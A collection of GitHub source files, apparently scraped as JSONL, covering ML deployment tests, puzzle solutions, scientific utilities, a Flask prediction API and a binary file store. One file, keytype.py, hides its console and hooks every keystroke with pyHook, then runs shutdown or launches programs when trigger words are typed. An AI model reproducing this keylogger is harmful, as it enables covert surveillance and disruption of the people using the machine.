backend_model():\n from mmdeploy.backend.onnxruntime import ORTWrapper\n ort_apis.__dict__.update({'ORTWrapper': ORTWrapper})\n wrapper = SwitchBackendWrapper(ORTWrapper)\n wrapper.set(outputs={\n 'output': torch.rand(1, num_output_channels, *heatmap_shape),\n })\n\n yield task_processor.build_backend_model([''])\n\n wrapper.recover()\n\n\ndef test_build_backend_model(backend_model):\n assert isinstance(backend_model, torch.nn.Module)\n\n\ndef test_visualize():\n datasample = generate_datasample(img.shape[:2])\n output_file = NamedTemporaryFile(suffix='.jpg').name\n task_processor.visualize(\n img, datasample, output_file, show_result=False, window_name='test')\n\n\ndef test_get_tensor_from_input():\n data = torch.ones(3, 4, 5)\n input_data = {'inputs': data}\n inputs = task_processor.get_tensor_from_input(input_data)\n assert torch.equal(inputs, data)\n\n\ndef test_get_partition_cfg():\n try:\n _ = task_processor.get_partition_cfg(partition_type='')\n except NotImplementedError:\n pass\n\n\ndef test_get_model_name():\n model_name = task_processor.get_model_name()\n assert isinstance(model_name, str) and model_name is not None\n\n\ndef test_build_dataset_and_dataloader():\n from torch.utils.data import DataLoader, Dataset\n val_dataloader = model_cfg['val_dataloader']\n dataset = task_processor.build_dataset(\n dataset_cfg=val_dataloader['dataset'])\n assert isinstance(dataset, Dataset), 'Failed to build dataset'\n dataloader = task_processor.build_dataloader(val_dataloader)\n assert isinstance(dataloader, DataLoader), 'Failed to build dataloader'\n\n\ndef test_build_test_runner(backend_model):\n from mmdeploy.codebase.base.runner import DeployTestRunner\n temp_dir = TemporaryDirectory().name\n runner = task_processor.build_test_runner(backend_model, temp_dir)\n assert isinstance(runner, DeployTestRunner)\n\n\ndef test_get_preprocess():\n process = task_processor.get_preprocess()\n assert process is not None\n\n\ndef test_get_postprocess():\n process = task_processor.get_postprocess()\n assert isinstance(process, dict)\n","repo_name":"open-mmlab/mmdeploy","sub_path":"tests/test_codebase/test_mmpose/test_pose_detection.py","file_name":"test_pose_detection.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"70368764328","text":"from typing import Callable, Tuple, List\nimport re\nimport numpy as np \n\nGrid = np.ndarray\nCoord = Tuple[int, int]\nInstruction = Tuple[Callable, Coord, Coord]\n\n\ndef turn_on(grid: Grid, x: Coord, y: Coord, part: bool) -> Grid:\n if part:\n grid[x[0]:y[0]+1, x[1]:y[1]+1] = 1\n else:\n grid[x[0]:y[0]+1, x[1]:y[1]+1] += 1\n return grid\n\n\ndef turn_off(grid: Grid, x: Coord, y: Coord, part: bool) -> Grid:\n if part:\n grid[x[0]:y[0]+1, x[1]:y[1]+1] = 0\n else:\n grid[x[0]:y[0]+1, x[1]:y[1]+1] = np.maximum(0, grid[x[0]:y[0]+1, x[1]:y[1]+1] - 1)\n return grid\n\n\ndef toggle(grid: Grid, x: Coord, y: Coord, part: bool) -> Grid:\n if part:\n grid[x[0]:y[0]+1, x[1]:y[1]+1] = 1 - grid[x[0]:y[0]+1, x[1]:y[1]+1]\n else:\n grid[x[0]:y[0]+1, x[1]:y[1]+1] += 2\n return grid\n\n\ndef parse_instructions(inst: str) -> Instruction:\n if 'on' in inst:\n fn = turn_on\n elif 'off' in inst:\n fn = turn_off\n elif 'toggle' in inst:\n fn = toggle\n else:\n raise Exception(\"I don't understand that instruction\")\n\n coords = re.findall(r\"\\b\\d[\\d,.]*\\b\", inst)\n x, y = coords\n x = tuple((int(c) for c in x.split(',')))\n y = tuple((int(c) for c in y.split(',')))\n\n return (fn, x, y) \n\n\ndef run_instructions(grid: Grid, instructions: List[Instruction], part: bool) -> Grid:\n for fn, x, y in instructions:\n grid = fn(grid, x, y, part)\n return grid\n\n\ndef data(file, parser=str, sep='\\n') -> list:\n \"Split the day's input file into sections separated by `sep`, and apply `parser` to each.\"\n with open(file) as f:\n sections = f.read().rstrip().split(sep)\n return list(map(parser, sections))\n\n\nif __name__ == '__main__':\n import sys \n\n file = sys.argv[1]\n part = int(sys.argv[2])\n if part == 1:\n part = False\n elif part == 2:\n part = True\n else:\n raise Exception(f\"Don't know that part: {part}\")\n\n instructions = data(file, parse_instructions)\n grid = np.zeros((1000, 1000))\n grid = run_instructions(grid, instructions, part)\n print(np.sum(grid))\n","repo_name":"siddharth1199/aoc_2017","sub_path":"optum_aoc/2015/day06/i.py","file_name":"i.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26401896666","text":"import click\nfrom pathlib import Path\nfrom typing import Union, List\n\nfrom loguru import logger\nimport numpy as np\nimport pandas as pd\nimport scipy.stats\nfrom vivarium_public_health.risks.data_transformations import pivot_categorical\n\nfrom vivarium_conic_lsff import globals as project_globals\n\n\ndef len_longest_location() -> int:\n \"\"\"Returns the length of the longest location in the project.\n\n Returns\n -------\n Length of the longest location in the project.\n \"\"\"\n return len(max(project_globals.LOCATIONS, key=len))\n\n\ndef sanitize_location(location: str):\n \"\"\"Cleans up location formatting for writing and reading from file names.\n\n Parameters\n ----------\n location\n The unsanitized location name.\n\n Returns\n -------\n The sanitized location name (lower-case with white-space and\n special characters removed.\n\n \"\"\"\n # FIXME: Should make this a reversible transformation.\n return location.replace(\" \", \"_\").replace(\"'\", \"_\").lower()\n\n\ndef delete_if_exists(*paths: Union[Path, List[Path]], confirm=False):\n paths = paths[0] if isinstance(paths[0], list) else paths\n existing_paths = [p for p in paths if p.exists()]\n if existing_paths:\n if confirm:\n # Assumes all paths have the same root dir\n root = existing_paths[0].parent\n names = [p.name for p in existing_paths]\n click.confirm(f\"Existing files {names} found in directory {root}. Do you want to delete and replace?\",\n abort=True)\n for p in existing_paths:\n logger.info(f'Deleting artifact at {str(p)}.')\n p.unlink()\n\n\ndef read_data_by_draw(artifact_path: str, key : str, draw: int) -> pd.DataFrame:\n \"\"\"Reads data from the artifact on a per-draw basis. This\n is necessary for Low Birthweight Short Gestation (LBWSG) data.\n\n Parameters\n ----------\n artifact_path\n The artifact to read from.\n key\n The entity key associated with the data to read.\n draw\n The data to retrieve.\n\n \"\"\"\n key = key.replace(\".\", \"/\")\n with pd.HDFStore(artifact_path, mode='r') as store:\n index = store.get(f'{key}/index')\n draw = store.get(f'{key}/draw_{draw}')\n draw = draw.rename(\"value\")\n data = pd.concat([index, draw], axis=1)\n data = data.drop(columns='location')\n data = pivot_categorical(data)\n data[project_globals.LBWSG_MISSING_CATEGORY.CAT] = project_globals.LBWSG_MISSING_CATEGORY.EXPOSURE\n return data\n\n\nclass BetaParams:\n\n def __init__(self, upper_bound, lower_bound, alpha, beta):\n self.upper_bound = upper_bound\n self.lower_bound = lower_bound\n self.support_width = self.upper_bound - self.lower_bound\n self.alpha = alpha\n self.beta = beta\n\n @classmethod\n def from_statistics(cls, mean, upper_bound, lower_bound, variance=None):\n if variance is None:\n variance = confidence_interval_variance(upper_bound, lower_bound)\n support_width = (upper_bound - lower_bound)\n mean = (mean - lower_bound) / support_width\n variance /= support_width ** 2\n alpha = mean * (mean * (1 - mean) / variance - 1)\n beta = (1 - mean) * (mean * (1 - mean) / variance - 1)\n return cls(upper_bound, lower_bound, alpha, beta)\n\n\ndef sample_beta_distribution(seed: int, params: BetaParams) -> float:\n \"\"\"Gets a single random draw from a scaled beta distribution.\n\n Parameters\n ----------\n seed\n Seed for the random number generator.\n\n Returns\n -------\n The random variate from the scaled beta distribution.\n\n \"\"\"\n # Handle degenerate distribution\n if params.upper_bound == params.lower_bound:\n return params.upper_bound\n\n np.random.seed(seed)\n return params.lower_bound + params.support_width*scipy.stats.beta.rvs(params.alpha, params.beta)\n\n\nclass LogNormParams:\n\n def __init__(self, sigma, scale):\n self.sigma = sigma\n self.scale = scale\n\n @classmethod\n def from_statistics(cls, median, upper_bound):\n # 0.975-quantile of standard normal distribution (=1.96, approximately)\n q_975 = scipy.stats.norm().ppf(0.975)\n mu = np.log(median) # mean of normal distribution for log(variable)\n sigma = (np.log(upper_bound) - mu) / q_975\n return cls(sigma, median)\n\n\ndef sample_lognormal_distribution(seed: int, params: LogNormParams):\n # Handle degenerate distribution\n if params.sigma == 0:\n return params.scale\n\n np.random.seed(seed)\n return scipy.stats.lognorm.rvs(s=params.sigma, scale=params.scale)\n\n\ndef confidence_interval_variance(upper, lower):\n ninety_five_percent_spread = (upper - lower) / 2\n std_dev = ninety_five_percent_spread / (2 * 1.96)\n return std_dev ** 2\n","repo_name":"ihmeuw/vivarium_conic_lsff_2017","sub_path":"src/vivarium_conic_lsff/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72701439849","text":"'''\nImageDatabase\n\nThis is a very simple interface to the image database.\n\nIt is specifically designed for inserting photo metadata\nand EXIF data.\n\nThis class could be redesigned as an abstract class, and\nsubclasses could be designed for working with different\nkinds of databases.\n\nAt the moment, it does no cleanup, so it could benefit from\na close() method to clean up the database connection.\n\n'''\n\nimport psycopg2 as ps\n\nclass ImageDatabase:\n\n def __init__(self):\n '''\n Constructor\n\n Connects to the postgres database in the postgres docker\n container described in docker-compose.yml.\n\n This could benefit\n from arguments that take the DB connection parameters, or read\n connection parameters in from a config file.\n '''\n self.conn = ps.connect(\n dbname='postgres',\n user='postgres',\n host='db'\n )\n self.curs = self.conn.cursor()\n\n def setup(self):\n '''\n Sets up the database tables.\n\n Right now, it drops every table whenever its run. It could\n probably benefit from a boolean argument that determines\n whether to drop a table if it exists or skip the creation.\n tables.sql would need to be updated to faciliate such a\n change.\n '''\n self.curs.execute(open('tables.sql', 'r').read())\n\n def insert_photo(self, origin_url, filename, extension, height, width):\n '''\n Inserts photo metadata into the database.\n\n This is straightforward and useful for the specific purposes of\n the project. It's convenient, but also tightly coupled to the\n image data source and this database schema.\n '''\n self.curs.execute('''\n INSERT INTO images (origin_url, filename, extension, height, width)\n VALUES (%s, %s, %s, %s, %s) RETURNING id\n ''', (origin_url, filename, extension, height, width))\n self.conn.commit()\n return self.curs.fetchone()[0]\n\n def insert_exif(self, image_id, tag_no, tag_name, value):\n '''\n Inserts photo EXIF data into the database\n\n The main problem with this method is that it coerces the 'value'\n argument to a string. Sometimes value is a primitive, sometimes\n it's a collection. Our data would be easier to work with a different\n database schema. tables.sql has more thoughts on that.\n '''\n self.curs.execute('''\n INSERT INTO images_exif (image_id, tag_no, tag_name, value)\n VALUES (%s, %s, %s, %s) \n ''', (image_id, tag_no, tag_name, str(value)))\n self.conn.commit()\n\nif __name__ == '__main__':\n ImageDatabase().setup()\n","repo_name":"downpat/exif-scraper","sub_path":"scraper/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8185956462","text":"import struct\r\nimport constants\r\nimport os\r\n\r\nclass Sequential_file:\r\n def __init__(self, filename, record, blocking_factor, empty_key=-1):\r\n self.filename = filename\r\n self.record = record\r\n self.header_size = struct.calcsize(\"ii\")\r\n self.record_size = struct.calcsize(self.record.format) #velicina sloga\r\n self.blocking_factor = blocking_factor\r\n self.block_size = self.record_size * self.blocking_factor #velicina bloka\r\n self.empty_key = empty_key\r\n\r\n def initialize_file(self):\r\n with open(self.filename, \"wb\") as f:\r\n header = [5, 0]\r\n br_slogova=[int(i) for i in header]\r\n r = struct.pack(\"ii\", *br_slogova)\r\n f.write(r)\r\n block = self.blocking_factor * [self.get_empty_rec()] #napravi blok pun praznih slogova\r\n self.write_block(f, block)\r\n\r\n def __find_in_block(self, block, rec):\r\n for j in range(self.blocking_factor):\r\n if block[j].get(\"evidencioni broj\") == self.empty_key or block[j].get(\"evidencioni broj\") > rec.get(\"evidencioni broj\"):\r\n return (True, j)\r\n\r\n return (False, None)\r\n\r\n def insert_record(self, rec):\r\n if self.find_by_id(rec.get(\"evidencioni broj\")): # Svakom upisu prethodi trazenje\r\n print(\"Already exists with ID {}\".format(rec.get(\"evidencioni broj\")))\r\n return\r\n\r\n with open(self.filename, \"rb+\") as f:\r\n f.seek(self.header_size)\r\n while True:\r\n block = self.read_block(f)\r\n\r\n if not block: # EOF\r\n break\r\n\r\n last = self.__is_last(block)\r\n here, j = self.__find_in_block(block, rec)\r\n\r\n if not here:\r\n continue\r\n\r\n # save last record for inserting into next block\r\n tmp_rec = block[self.blocking_factor-1]\r\n for k in range(self.blocking_factor-1, j, -1):\r\n block[k] = block[k-1] # move records\r\n block[j] = rec # insert\r\n rec = tmp_rec # new record for insertion\r\n\r\n f.seek(-self.block_size, 1)\r\n self.write_block(f, block)\r\n\r\n # last block without empty rec?\r\n if last and block[self.blocking_factor-1].get(\"evidencioni broj\") != self.empty_key:\r\n block = self.blocking_factor*[self.get_empty_rec()]\r\n self.write_block(f, block)\r\n\r\n def __is_last(self, block):\r\n for i in range(self.blocking_factor):\r\n if block[i].get(\"evidencioni broj\") == self.empty_key:\r\n return True\r\n return False\r\n\r\n def print_file(self):\r\n i = 0\r\n with open(self.filename, \"rb\") as f:\r\n #header = f.read(self.header_size)\r\n #print(\"Header \" + str(struct.unpack(\"ii\", header)))\r\n f.seek(self.header_size)\r\n while True:\r\n block = self.read_block(f)\r\n\r\n if not block:\r\n break\r\n\r\n i += 1\r\n print(\"Block {}\".format(i))\r\n self.print_block(block)\r\n\r\n def find_by_id(self, id):\r\n i = 0\r\n with open(self.filename, \"rb\") as f:\r\n f.seek(self.header_size)\r\n while True:\r\n block = self.read_block(f)\r\n\r\n if not block:\r\n return None\r\n\r\n for j in range(self.blocking_factor):\r\n if block[j].get(\"evidencioni broj\") == id:\r\n return (i, j)\r\n if block[j].get(\"evidencioni broj\") > id:\r\n return None\r\n i += 1\r\n\r\n def delete_by_id(self, id):\r\n found = self.find_by_id(id)\r\n\r\n if not found:\r\n return\r\n\r\n block_idx = found[0]\r\n rec_idx = found[1]\r\n next_block = None\r\n\r\n with open(self.filename, \"rb+\") as f:\r\n #f.seek(self.header_size)\r\n while True:\r\n f.seek(8 + block_idx * self.block_size) # last block\r\n block = self.read_block(f)\r\n\r\n for i in range(rec_idx, self.blocking_factor-1):\r\n block[i] = block[i+1] # move records\r\n\r\n if self.__is_last(block): # is last block full?\r\n f.seek(-self.block_size, 1)\r\n self.write_block(f, block)\r\n break\r\n\r\n next_block = self.read_block(f)\r\n # first record of next block is now the last of current one\r\n block[self.blocking_factor-1] = next_block[0]\r\n f.seek(-2*self.block_size, 1)\r\n self.write_block(f, block)\r\n\r\n block_idx += 1\r\n rec_idx = 0\r\n\r\n if next_block and next_block[0].get(\"evidencioni broj\") == self.empty_key:\r\n os.ftruncate(os.open(self.filename, os.O_RDWR),\r\n block_idx * self.block_size + 8)\r\n\r\n def write_block(self, file, block):\r\n binary_data = bytearray() # Niz bita koji bi trebalo da se upise u datoteku\r\n\r\n # Svaki slog u bloku serijalizujemo i dodamo u niz bajta\r\n for rec in block:\r\n rec_binary_data = self.record.dict_to_encoded_values(rec)\r\n binary_data.extend(rec_binary_data)\r\n\r\n file.write(binary_data)\r\n\r\n def read_block(self, file):\r\n # Citanje od trenutne pozicije\r\n binary_data = file.read(self.block_size)\r\n block = []\r\n\r\n if len(binary_data) == 0:\r\n return block\r\n\r\n for i in range(self.blocking_factor): # slajsingom izdvajamo niz bita za svaki slog, i potom vrsimo otpakivanje\r\n begin = self.record_size*i\r\n end = self.record_size*(i+1)\r\n block.append(self.record.encoded_tuple_to_dict(\r\n binary_data[begin:end]))\r\n\r\n return block\r\n\r\n def write_record(self, f, rec):\r\n binary_data = self.record.dict_to_encoded_values(rec)\r\n f.write(binary_data)\r\n\r\n def read_record(self, f):\r\n binary_data = f.read(self.record_size)\r\n\r\n if len(binary_data) == 0:\r\n return None\r\n\r\n return self.record.encoded_tuple_to_dict(binary_data)\r\n\r\n def print_block(self, b):\r\n for i in range(self.blocking_factor):\r\n print(b[i])\r\n\r\n def get_empty_rec(self):\r\n return {\"evidencioni broj\": self.empty_key, \"registarska oznaka\": \"\", \"datum i vreme\": \"\", \"oznaka parking mesta\": \"\", \"duzina boravka\": \"\", \"status\": 0}","repo_name":"SasteS/SequentialFile","sub_path":"Projekat1/sequential_file.py","file_name":"sequential_file.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6739145402","text":"nested_list=[[1,2,3,4,5], [6,7,8,9,10],[1000,1000]]\ndef nest_sum(nested_list):\n '''Write a function called nested_sum that\n takes a list of lists of integers and adds up\n the elements from all of the nested lists. For example:'''\n ans=0\n for num_list in nested_list:\n for number in num_list:\n ans= ans+number\n return ans\nprint(str(nest_sum(nested_list)))","repo_name":"balbazauras/think-python","sub_path":"Chapter10_lists/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16949384664","text":"import os\nimport glob\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.table import Table\nfrom astropy.coordinates import SkyCoord\n\n\n#####################\n### set keys\n#####################\ndir_fits = \"/Users/saito/data/myproj_active/proj_santoro01_ngc1365/data_raw/\"\ndir_product = \"/Users/saito/data/myproj_active/proj_santoro01_ngc1365/products/\"\ncatalog_fits = \"ngc1365_co21_v1p0_props.fits\"\nmom0_fits = \"ngc1365_12m+7m+tp_co21_broad_mom0.fits\"\noutput = \"ngc1365_cprops_mask_1p38_deconv.fits\"\nsnr = 5.0 # peak signal-to-noise ratio threshold to identify clouds\nscale = 120.0 / 1.378 # parsec / arcsec\nimage_ra_cnt = \"03:33:36.406\"\nimage_decl_cnt = \"-36.08.24.023\"\n\n\n#####################\n### Main Procedure\n#####################\ndone = glob.glob(dir_product)\nif not done:\n os.mkdir(dir_product)\n\nhdu_list = fits.open(dir_fits + catalog_fits, memmap=True)\ndata = Table(hdu_list[1].data)\n\ngmc_ra_dgr = data[\"XCTR_DEG\"] # center ra position of the cloud in decimal degrees\ngmc_decl_dgr = data[\"YCTR_DEG\"] # center decl position of the cloud in decimal degrees\ngmc_radius_pc = data[\"RAD_NOEX\"] # the deconvolved radius without extrapolation in parsecs\ngmc_sn_ratio = data[\"S2N\"] # the peak signal-to-noise ratio in the cloud\n#gmc_maj = data[\"FWHM_MAJ_DC\"]\n#gmc_min = data[\"FWHM_MAJ_DC\"]\n#gmc_pa = data[\"POSANG\"] * 180 / np.pi\n\ncut = (gmc_radius_pc > 0.) & (gmc_sn_ratio > snr)\n\ngmc_ra_dgr = gmc_ra_dgr[cut]\ngmc_decl_dgr = gmc_decl_dgr[cut]\ngmc_radius_arcsec = gmc_radius_pc[cut] / scale\n\n# get native grid information\nnum_x_pix = imhead(dir_fits+mom0_fits,mode=\"list\")[\"shape\"][0]\nnum_y_pix = imhead(dir_fits+mom0_fits,mode=\"list\")[\"shape\"][1]\npix_radian = imhead(dir_fits+mom0_fits,mode=\"list\")[\"cdelt2\"]\nobsfreq = imhead(dir_fits+mom0_fits,mode=\"list\")[\"restfreq\"][0]/1e9\npix_arcsec = round(pix_radian * 3600 * 180 / np.pi, 3)\n\n# create image\n# create template image\nblc_ra_tmp = imstat(dir_fits+mom0_fits)[\"blcf\"].split(\", \")[0]\nblc_dec_tmp = imstat(dir_fits+mom0_fits)[\"blcf\"].split(\", \")[1]\nblc_ra = blc_ra_tmp.replace(\":\",\"h\",1).replace(\":\",\"m\",1)+\"s\"\nblc_dec = blc_dec_tmp.replace(\".\",\"d\",1).replace(\".\",\"m\",1)+\"s\"\nbeamsize = round(imhead(dir_fits+mom0_fits,\"list\")[\"beammajor\"][\"value\"], 2)\npix_size = round(beamsize/4.53, 2)\nsize_x = num_x_pix # int(image_length / pix_size)\nsize_y = num_y_pix # size_x\nc = SkyCoord(blc_ra, blc_dec)\nra_dgr = str(c.ra.degree)\ndec_dgr = str(c.dec.degree)\ncl.done()\n\nfor i in range(len(gmc_radius_arcsec)):\n direction = \"J2000 \" + str(gmc_ra_dgr[i])+\"deg \" + str(gmc_decl_dgr[i])+\"deg\"\n cl.addcomponent(dir=direction,\n flux=1.0,\n fluxunit=\"Jy\",\n freq=str(obsfreq)+\"GHz\",\n shape=\"disk\",\n majoraxis=str(gmc_radius_arcsec[i])+\"arcsec\",\n minoraxis=str(gmc_radius_arcsec[i])+\"arcsec\",\n positionangle=\"0deg\")\n\nia.fromshape(dir_product+output.replace(\".fits\",\".im\"),[size_x,size_y,1,1],overwrite=True)\ncs=ia.coordsys()\ncs.setunits([\"rad\",\"rad\",\"\",\"Hz\"])\ncell_rad=qa.convert(qa.quantity(str(pix_size)+\"arcsec\"),\"rad\")[\"value\"]\ncs.setincrement([-cell_rad,cell_rad],\"direction\")\ncs.setreferencevalue([qa.convert(image_ra_cnt,\"rad\")[\"value\"],\n qa.convert(image_decl_cnt,\"rad\")[\"value\"]],\n type=\"direction\")\ncs.setreferencevalue(str(obsfreq)+\"GHz\",\"spectral\")\ncs.setincrement(\"1GHz\",\"spectral\")\nia.setcoordsys(cs.torecord())\nia.setbrightnessunit(\"Jy/pixel\")\nia.modify(cl.torecord(),subtract=False)\n\nimmath(imagename=dir_product+output.replace(\".fits\",\".im\"),\n expr=\"iif(IM0>0,1,0)\",\n outfile=dir_product+output.replace(\".fits\",\".im2\"))\n\nexportfits(imagename=dir_product+output.replace(\".fits\",\".im2\"),\n fitsimage=dir_product+output,\n overwrite=True)\n\nos.system(\"rm -rf \" + dir_product + output.replace(\".fits\",\".im\"))\nos.system(\"rm -rf \" + dir_product + output.replace(\".fits\",\".im2\"))\n\ncl.close()\n\nos.system(\"rm -rf *.last\")\n","repo_name":"toshikisaito1005/mycasa_scripts","sub_path":"mycasa_scripts_active/scripts_santoro01_ngc1365/cprops2mask_deconv_circle.py","file_name":"cprops2mask_deconv_circle.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12952590793","text":"# Importing essential libraries\nfrom flask import Flask, render_template, request, jsonify\nimport pickle\nimport numpy as np\nfrom flask_cors import CORS\nfrom os.path import join, dirname, realpath\nimport warnings\n\n# Suppressing all warnings\nwarnings.filterwarnings('ignore')\n\n# Initializing Flask app\napp = Flask(__name__)\napp.secret_key = \"planthealthcare\"\nCORS(app) # Enabling CORS\n\n# Load the KNN Trained model Weights and Scaler\nprint('Wait Model Is Loading')\n\n# Load the saved scaler\nscalar_file = join(dirname(realpath(__file__)), 'fitted_scaler.pkl')\nwith open(scalar_file, 'rb') as file:\n loaded_scaler = pickle.load(file) # Loading the scaler object\n\n# Get the absolute path to the pickle file containing the trained model\nfilename = join(dirname(realpath(__file__)), 'best_knn_classifier.pickle')\n\n# Load the trained model\nwith open(filename, 'rb') as file:\n knn_classifier = pickle.load(file) # Loading the model object\n\nprint('Successfully Loaded')\n\n\n@app.route('/')\ndef home():\n \"\"\"\n Home route to check if the server is active.\n :return: A string indicating that the server is active.\n \"\"\"\n return 'Server is active and ready to give service related to plant health care.'\n\n\n@app.route('/predict/api', methods=['POST'])\ndef predict():\n \"\"\"\n API endpoint to predict the plant health based on the received parameters.\n It receives the parameters as JSON and returns the prediction as JSON.\n :return: A JSON object containing the status and the prediction or an error message.\n \"\"\"\n if request.method == 'POST':\n try:\n data = request.json # Getting the data sent in JSON format\n # Extracting individual parameters from the received JSON data\n Light = float(data['light'])\n Nitrogen = float(data['nitrogen'])\n Phosphorus = float(data['phosphorus'])\n Potassium = float(data['potassium'])\n Humidity = float(data['humidity'])\n Temp1 = float(data['temp1'])\n Temp2 = float(data['temp2'])\n Moisture = float(data['moisture'])\n\n # Preparing the input data\n input_data = np.array(\n [[Light, Nitrogen, Phosphorus,\tPotassium,\t Humidity,\tTemp1,\tTemp2,\t Moisture]])\n\n # Scaling the input data using the loaded scaler\n new_data = loaded_scaler.transform(input_data)\n\n # Making prediction using the loaded model\n my_prediction = knn_classifier.predict(new_data)\n\n # Mapping the predicted class to the respective plant health category\n class_mapping = {0: 'Healthy', 1: 'Moderate', 2: 'Unhealthy'}\n # Getting the final result\n final_result = class_mapping[my_prediction[0]]\n\n # Returning the prediction as JSON\n return jsonify(status='success', prediction=final_result.upper())\n\n except Exception as e:\n # Returning the error message as JSON\n return jsonify(status='error', message=str(e))\n\n # Returning an error message if the method is not allowed\n return jsonify(status='error', message='Method not allowed')\n\n\nif __name__ == '__main__':\n app.run(debug=True) # Running the app in debug mode\n","repo_name":"jawadahmed2/Plant-Health-Prediction-From-Sensors-Data","sub_path":"Server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"349669046","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 11 23:33:47 2021\n\n@author: Stian\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\nimport matplotlib.image as mpimg\nimport matplotlib.animation as animation\n\nimport cv2\n\nlinename = \"linje9\"\n\nimg = cv2.imread('lines/'+linename+'.png',0)\nimg[img > 1] = 255\n\nwhere_pixels = np.where(img == 0)\ncoords = np.array([(y,x, str(y)+str(x)) for x,y in zip(where_pixels[0], where_pixels[1])])\n\n\ndef give_nearest_coords(coords):\n coords_in_order = [(int(coords[0][0]), int(coords[0][1]))]\n active_coords = coords[1:]\n \n x,y,string_coord = coords[0]\n \n while len(active_coords) > 0:\n #print(len(active_coords))\n \n next_coords = find_nearest(int(x), int(y), active_coords)\n \n if next_coords:\n # pop out x,y in active_coords\n idx = np.where(active_coords[:,2] == string_coord)\n active_coords = np.delete(active_coords, idx[0], axis=0)\n \n x,y,dist,string_coord = next_coords\n coords_in_order.append((int(x),int(y)))\n else:\n coords_in_order.append((int(x),int(y)))\n active_coords = np.delete(active_coords, 0, axis=0)\n \n return coords_in_order\n \n\n\n\ndef find_nearest(x,y, coords):\n all_distances = []\n for x_, y_,string_coord in coords:\n avstand = np.square((x-int(x_))**2 + (y-int(y_))**2)\n if avstand > 0:\n all_distances.append((x_,y_, avstand, string_coord))\n if len(all_distances) > 0:\n return sorted(all_distances, key=lambda k: k[2])[0]\n \n\na = give_nearest_coords(coords)\nlinje1 = pd.DataFrame(a, columns=[\"x\", \"y\"])\nlinje1.to_csv(\"lines/\"+linename+\".csv\")\n\n \n \n \n \n ","repo_name":"stianteien/TrainsWithBrains","sub_path":"make_line.py","file_name":"make_line.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39241807357","text":"from time import time\n\nisPall = lambda s : str(s)==str(s)[::-1]\n\nstart = time()\nans = max([i*j for (i,j) in enumerate(list(range(100,1001)),100) if isPall(i*j)])\n\nif __name__ == \"__main__\":\n print(f\"\\nAnswer: { ans }\")\n print(f\"Time taken: { time() - start }\\n\")\n","repo_name":"fermihacker/Project-Euler","sub_path":"Python/Problem004.py","file_name":"Problem004.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18764448713","text":"import pandas as pd\n\n# Single series examples\na = [1, 7, 2]\n\nmyseries = pd.Series(a, index = [\"x\", \"y\", \"z\"])\n\nprint(myseries)\n\n# names\n\ndata = {\n \"thad moments\" : [0, 2, 4],\n \"jai moments\" : [4, 2, 1]\n}\n\ndf = pd.DataFrame(data, index = [\"day 1\", \"day 2\", \"day 3\"])\nprint(df)\nprint(df.loc[\"day 1\"])","repo_name":"jgoetzmann/programming-classes","sub_path":"dataVis/Day04-Pandas/pandastest.py","file_name":"pandastest.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10838143199","text":"import win32api\r\nimport win32console\r\nimport win32gui\r\nimport pythoncom,pyHook\r\nimport os\r\n\r\n\r\n \r\nwin=win32console.GetConsoleWindow()\r\nwin32gui.ShowWindow(win,0)\r\n\r\ndata=''\r\ndef OnKeyboardEvent(event):\r\n global data\r\n if event.Ascii==13:\r\n keys=''\r\n elif event.Ascii==8:\r\n keys=''\r\n elif event.Ascii==9:\r\n keys=''\r\n else:\r\n keys=chr(event.Ascii)\r\n data=data+keys\r\n local()\r\n \r\ndef local():\r\n global data\r\n if \"goodbye\" in data:\r\n os.system('shutdown -s')\r\n data = \"\"\r\n if \"notepad\" in data:\r\n os.system('start notepad')\r\n data = \"\"\r\n if \"internetexp\" in data:\r\n os.system('start iexplore')\r\n data = \"\"\r\n return True\r\n\r\n\r\n \r\n\r\n\r\n \r\nhm=pyHook.HookManager()\r\nhm.KeyDown=OnKeyboardEvent \r\nhm.HookKeyboard() \r\npythoncom.PumpMessages()\r\n","repo_name":"GokuSsj21/keyloggerAndCmdExec","sub_path":"keytype.py","file_name":"keytype.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5953205307","text":"import requests\nimport os\nimport json\nfrom datetime import datetime, timezone\nfrom .logger import logger\n\n\ndef utc_time_string():\n utc_time = datetime.utcnow().replace(tzinfo=timezone.utc)\n return datetime.strftime(utc_time, \"%Y-%m-%d %H:%M:%S %Z\")\n\n\ndef write_info_into_config(**kwargs):\n config = {\n \"last_update_time\": utc_time_string(),\n **kwargs,\n }\n with open(\"./page/config.json\", \"w\", encoding=\"utf-8\") as config_file:\n json.dump(config, config_file)\n\n\ndef get_user_config():\n if os.getenv(\"UID_PWD\") is 